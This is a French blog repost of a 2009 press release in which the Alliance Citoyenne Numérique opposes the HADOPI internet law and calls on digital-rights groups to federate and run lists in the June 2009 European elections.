Face aux menaces qui pèsent aujourd’hui sur celle ci, l’Alliance Citoyenne Numérique demande la prise de l’HADOPI, nouvelle loi liberticide sur le point d’être votée par notre parlement.

En 1789 les citoyens français prennent la Bastille, symbole d’une nouvelle aire de liberté.

Face aux menaces qui pèsent aujourd’hui sur celle ci, l’Alliance Citoyenne Numérique demande la « prise de l’HADOPI », nouvelle loi liberticide sur le point d’être votée par notre parlement.

Toutes les actions menées par l’UFC que choisir, Dailymotion, la Quadrature du net, SVM mag, l’April et bien d’autres sont malheureusement restées insuffisantes à mesure que les amendements étaient un à un rejetés.

Ces dernières heures, un ultime rempart symbolisé par l’amendement 470 a cédé, la voie est donc libre pour une adoption du texte ce jeudi, mettant ainsi en place des moyens d’écoutes, de surveillances de l’espace de liberté qu’était l’Internet, de fichage, de traque des internautes sans représentant de le CNIL et une machine répressive sans appel entraînant la coupure de l’abonnement Internet pourtant considéré par le parlement européen comme exclusion démocratique.

L’alliance citoyenne numérique propose à tous les défenseurs de la liberté numérique de former une fédération, une alliance permettant de coordonner nos actions, d’informer le grand public et de faire enfin réagir les députés Français.

Notre dernière chance est d’occuper la tribune des élections européennes de juin 2009 en proposant 5 listes sur le territoire et ainsi obtenir un temps d’antenne officiel dans la campagne audiovisuelle.
Parce que les libertés de demain se décident aujourd’hui,
Parce que nous sommes tous unis par le même désir de partage,

L’Alliance se mobilise !

source: http://www.zataz.com/communique-presse/18817/Alliance-Citoyenne-Numerique.html

Posted in Divers | No Comments »

« Older Entries